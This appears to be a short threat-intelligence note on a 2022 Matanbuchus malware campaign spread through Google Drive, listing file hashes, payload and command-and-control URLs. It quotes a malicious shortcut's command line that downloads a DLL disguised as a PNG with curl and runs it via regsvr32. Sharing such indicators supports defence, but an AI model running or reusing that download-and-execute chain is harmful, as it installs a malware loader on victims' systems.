17.06.2022 | Matanbuchus | Gdrive

******************************

.zip 5e538b69ffcc40039d8c1b5af766c188c8f4afc15363c2f9bd570beef10d3f71
.dll 6c28c703f185aa4d626a1523b03c2893d6401e24b52a4081d2624cad9932d405

******************************

lnk file contents >

cmd.exe
/q /c echo 'FJ' && MD "%USERPROFILE%\fm_j" && curl.exe --output %USERPROFILE%\fm_j\ooTCNA.Hcw.Thw https://slgemseller.com/rmaS/Es.png && regsvr32 -e -n -i:"Update Installation" "%USERPROFILE%\fm_j\ooTCNA.Hcw.Thw" && ping pXl.com
C:\Windows\HelpPane.exe

******************************

Exec >> .zip .lnk > .dll

cmd /c C:\Users\Admin\AppData\Local\Temp\AreaDoc\AreaDoc448.lnk

cmd.exe" /q /c echo 'FJ' && MD "C:\Users\Admin\fm_j" && curl.exe --output C:\Users\Admin\fm_j\ooTCNA.Hcw.Thw https://slgemseller.com/rmaS/Es.png && regsvr32 -e -n -i:"Update Installation" "C:\Users\Admin\fm_j\ooTCNA.Hcw.Thw" && ping pXl.com

*************************************************

https://slgemseller.com/rmaS/Es.png (Matanbuchus .dll)

*************************************************

c2's

http://updatesservic.com/mtaggsM/YmQzcuM/home.aspx
https://communicationreporting.com/mtaggsM/YmQzcuM/auth.aspx
http://telemetryreporting.com/mtaggsM/YmQzcuM/home.aspx
https://telemetryservic.com/mtaggsM/YmQzcuM/home.aspx
https://telemetryservic.com/mtaggsM/YmQzcuM/auth.aspx
